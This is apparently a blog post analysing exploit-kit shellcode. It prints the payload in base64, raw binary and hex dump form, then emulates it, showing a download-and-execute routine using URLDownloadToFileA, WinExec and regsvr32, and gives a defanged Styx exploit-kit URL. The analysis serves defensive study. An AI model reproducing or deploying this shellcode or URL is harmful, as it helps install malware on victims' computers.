QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEpOJASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyiOU8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==
And bin output:
: ^@^@^@^@]<83>í^E1Éd<8b>q0<8b>v^L<8b>v^\<8b>F^H<8b>~ <8b>6f9O^Xuò¾ï^@^@^@^Aî¿Ï^@^@^@^Aïè<80>^A^@^@<89>ê<81>Âï^@^@^@Rh<80>^@^@^@ÿ<95>Ï^@^@^@<89>ê<81>Âï^@^@^@1ö^AÂ<8a><9c>5^@^B^@^@<80>û^@t^F<88>^\2FëîÆ^D2^@<89>ê<81>Ââ^A^@^@Rÿ<95>Ó^@^@^@<89>ê<81>Âí^A^@^@RPÿ<95>×^@^@^@j^@j^@<89>ê<81>Âï^@^@^@R<89>ê<81>Â^K^B^@^@Rj^@ÿÐj^E<89>ê<81>Âï^@^@^@Rÿ<95>Û^@^@^@j^E<89>ê<81>Âã^@^@^@Rÿ<95>Û^@^@^@j^@ÿ<95>ß^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@regsvr32 -s GetTempPathA^@LoadLibraryA^@GetProcAddress^@WinExec^@ExitProcess^@»<89>ò<89>÷0À®uý)÷<89>ù1À¾<^@^@^@^Cµ¸^A^@^@f^C<85>¸^A^@^@<8b>px<83>Æ^\^Cµ¸^A^@^@<8d>½¼^A^@^@^C<85>¸^A^@^@«^C<85>¸^A^@^@P«^C<85>¸^A^@^@«^1ÛV^C<85>¸^A^@^@<89>Æ<89>×Qüó¦Yt^D^Cëé^<93>Ñà^C<85>Ä^A^@^@1ö<96>fÁà^B^C<85>¼^A^@^@<89>Æ^C<85>¸^A^@^@Ãë^P^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<89><85>¸^A^@^@VWèXÿÿÿ_^«^AÎ<80>>»t^BëíÃURLMON.DLL^@URLDownloadToFileA^@User32.exe^@&h=03^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
3. The shellcode/binary content
0000000: c3a8 0000 0000 5dc2 83c3 ad05 31c3 8964 ......].....1..d 0000010: c28b 7130 c28b 760c c28b 761c c28b 4608 ..q0..v...v...F. 0000020: c28b 7e20 c28b 3666 394f 1875 c3b2 c2be ..~ ..6f9O.u.... 0000030: c3af 0000 0001 c3ae c2bf c38f 0000 0001 ................ 0000040: c3af c3a8 c280 0100 00c2 89c3 aac2 81c3 ................ 0000050: 82c3 af00 0000 5268 c280 0000 00c3 bfc2 ......Rh........ 0000060: 95c3 8f00 0000 c289 c3aa c281 c382 c3af ................ 0000070: 0000 0031 c3b6 01c3 82c2 8ac2 9c35 0002 ...1.........5.. 0000080: 0000 c280 c3bb 0074 06c2 881c 3246 c3ab .......t....2F.. 0000090: c3ae c386 0432 00c2 89c3 aac2 81c3 82c3 .....2.......... 00000a0: a201 0000 52c3 bfc2 95c3 9300 0000 c289 ....R........... 00000b0: c3aa c281 c382 c3ad 0100 0052 50c3 bfc2 ...........RP... 00000c0: 95c3 9700 0000 6a00 6a00 c289 c3aa c281 ......j.j....... 00000d0: c382 c3af 0000 0052 c289 c3aa c281 c382 .......R........ 00000e0: 0b02 0000 526a 00c3 bfc3 906a 05c2 89c3 ....Rj.....j.... 00000f0: aac2 81c3 82c3 af00 0000 52c3 bfc2 95c3 ..........R..... 0000100: 9b00 0000 6a05 c289 c3aa c281 c382 c3a3 ....j........... 0000110: 0000 0052 c3bf c295 c39b 0000 006a 00c3 ...R.........j.. 0000120: bfc2 95c3 9f00 0000 0000 0000 0000 0000 ................ 0000130: 0000 0000 0000 0000 0000 0000 7265 6773 ............regs 0000140: 7672 3332 202d 7320 4765 7454 656d 7050 vr32 -s GetTempP 0000150: 6174 6841 004c 6f61 644c 6962 7261 7279 athA.LoadLibrary 0000160: 4100 4765 7450 726f 6341 6464 7265 7373 A.GetProcAddress 0000170: 0057 696e 4578 6563 0045 7869 7450 726f .WinExec.ExitPro 0000180: 6365 7373 00c2 bbc2 89c3 b2c2 89c3 b730 cess...........0 0000190: c380 c2ae 75c3 bd29 c3b7 c289 c3b9 31c3 ....u..)......1. 00001a0: 80c2 be3c 0000 0003 c2b5 c2b8 0100 0066 ...<...........f 00001b0: c2ad 03c2 85c2 b801 0000 c28b 7078 c283 ............px.. 00001c0: c386 1c03 c2b5 c2b8 0100 00c2 8dc2 bdc2 ................ 00001d0: bc01 0000 c2ad 03c2 85c2 b801 0000 c2ab ................ 00001e0: c2ad 03c2 85c2 b801 0000 50c2 abc2 ad03 ..........P..... 00001f0: c285 c2b8 0100 00c2 ab5e 31c3 9bc2 ad56 .........^1....V 0000200: 03c2 85c2 b801 0000 c289 c386 c289 c397 ................ 0000210: 51c3 bcc3 b3c2 a659 7404 5e43 c3ab c3a9 Q......Yt.^C.... 0000220: 5ec2 93c3 91c3 a003 c285 c384 0100 0031 ^..............1 0000230: c3b6 c296 66c2 adc3 81c3 a002 03c2 85c2 ....f........... 0000240: bc01 0000 c289 c386 c2ad 03c2 85c2 b801 ................ 0000250: 0000 c383 c3ab 1000 0000 0000 0000 0000 ................ 0000260: 0000 0000 0000 00c2 89c2 85c2 b801 0000 ................ 0000270: 5657 c3a8 58c3 bfc3 bfc3 bf5f 5ec2 ab01 VW..X......_^... 0000280: c38e c280 3ec2 bb74 02c3 abc3 adc3 8355 ....>..t.......U 0000290: 524c 4d4f 4e2e 444c 4c00 5552 4c44 6f77 RLMON.DLL.URLDow 00002a0: 6e6c 6f61 6454 6f46 696c 6541 0055 7365 nloadToFileA.Use 00002b0: 7233 322e 6578 6500 2668 3d30 3300 0000 r32.exe.&h=03... 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
We can see what will be performed. regsvr and dowload file. We can however not see from where the file is downloaded. Looks strange with that "h=03"? Does not look like XORed eather but lets see:
4. Emulating execution
$sctest -Ss 1000000000 < shell.bin
Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
ExitProcess(0)
stepcount 34540
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] cpu state eip=0x004170cf
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] eax=0x00000020 ecx=0x0000000c edx=0x004170e3 ebx=0x7c805800
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] esp=0x00416fce ebp=0x00417000 esi=0x0000000a edi=0x004170e3
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] Flags:
DWORD GetTempPathA (
DWORD nBufferLength = 128;
LPTSTR lpBuffer = 0x004170ef =>
= "c:\tmp\";
) = 7;
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x004171e2 =>
= "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7df20000 =>
none;
LPCSTR lpProcName = 0x004171ed =>
= "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x0041720b =>
= "&h=03";
LPCTSTR szFileName = 0x004170ef =>
= "c:\tmp\User32.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x004170ef =>
= "c:\tmp\User32.exe";
UINT uCmdShow = 5;
) = 32;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x004170e3 =>
= "regsvr32 -s c:\tmp\User32.exe";
UINT uCmdShow = 5;
) = 32;
void ExitProcess (
UINT uExitCode = 0;
) = 0;
Nothing more. I guess the bad guys was too quick on this one, forgetting to add the full URL to the malware.
5. Epilogue
If we look at the Styx URL to EXE files:
hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11
we can see that the "g=03" fits into the picture and the assumption above should stick.
No comments:
Post a Comment